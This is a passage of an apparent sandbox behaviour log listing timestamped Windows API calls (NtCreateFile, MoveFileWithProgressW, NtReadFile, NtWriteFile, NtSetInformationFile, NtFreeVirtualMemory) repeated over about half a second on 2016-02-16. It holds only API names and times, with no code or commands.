"api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,925", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,925", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,925", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,925", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,925", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,935", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,935", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,935", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,935", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,935", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,935", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,935", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,935", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,945", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,945", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,945", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,945", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,945", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,945", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,945", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,945", "api": 
"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,945", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,945", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,955", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,955", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,955", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,955", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,955", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,955", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,955", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,955", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,955", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,965", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,965", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,965", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,965", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,965", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,965", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,965", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,975", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,975", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,975", "api": "MoveFileWithProgressW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:43,975", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,975", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,975", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,975", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,975", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,985", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,985", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,985", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,985", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,985", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,985", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,995", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,995", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,995", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,995", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,995", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,995", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,995", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,995", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,995", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,995", "api": "NtSetInformationFile"}, {"category": "process", 
"timestamp": "2016-02-16 17:41:44,005", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,005", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,005", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,005", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,005", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,005", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,005", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,005", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,005", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,005", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,005", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,015", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,015", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,015", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,015", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,015", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,015", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,015", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,015", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,015", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,015", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:44,015", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,025", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,025", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,025", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,025", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,025", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,025", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,025", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,025", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,025", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,025", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,025", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,035", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,035", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,035", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,035", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,035", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,035", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,035", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,035", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,035", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,035", 
"api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,045", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,045", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,045", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,045", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,045", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,045", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,045", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,045", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,045", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,045", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,045", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,055", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,055", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,055", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,055", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,055", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,055", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,055", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,055", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,066", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,066", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,066", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,066", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,066", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,066", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,066", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,066", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,076", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,076", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,076", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,076", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,076", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,076", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,086", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,086", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,086", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,086", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,086", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,086", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,086", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,086", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,096", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,096", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,096", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,096", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,096", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,096", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,106", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,106", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,106", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,106", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,106", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,106", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,106", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,116", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,116", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,116", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,116", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:44,116", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,126", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,126", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,126", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,126", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,126", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,126", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,126", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,126", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,136", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,136", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,136", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,136", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,136", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,146", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,146", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,146", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,146", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,156", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,166", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,166", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:44,166", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,166", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,166", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,166", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,166", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,166", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,176", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,176", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,176", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,176", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,176", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,176", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,176", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,176", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,186", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,186", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,186", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,186", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,186", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,186", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,186", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:44,186", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,186", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,196", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,196", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,196", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,196", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,196", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,196", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,196", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,196", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,206", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,206", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,206", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,206", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,206", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,206", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,206", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,206", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:44,216", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,216", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,216", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,216", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,216", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,216", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,216", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,216", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,216", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,226", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,226", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,226", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,226", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,226", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,226", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,226", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,226", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,226", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,236", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,236", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,236", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,236", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,236", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,236", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,236", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,236", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,246", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,246", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,246", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,246", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,246", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,246", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,246", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,246", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,246", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,246", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,246", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,256", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,256", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,256", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,256", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,256", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,256", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,256", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,256", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,256", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,256", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,256", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,266", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,266", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,266", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,266", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,266", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,266", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,266", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,266", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,266", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,276", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,276", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,286", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,286", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,286", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,286", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,286", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,286", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,296", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,296", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,296", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,296", "api": "MoveFileWithProgressW"}, {"category": 
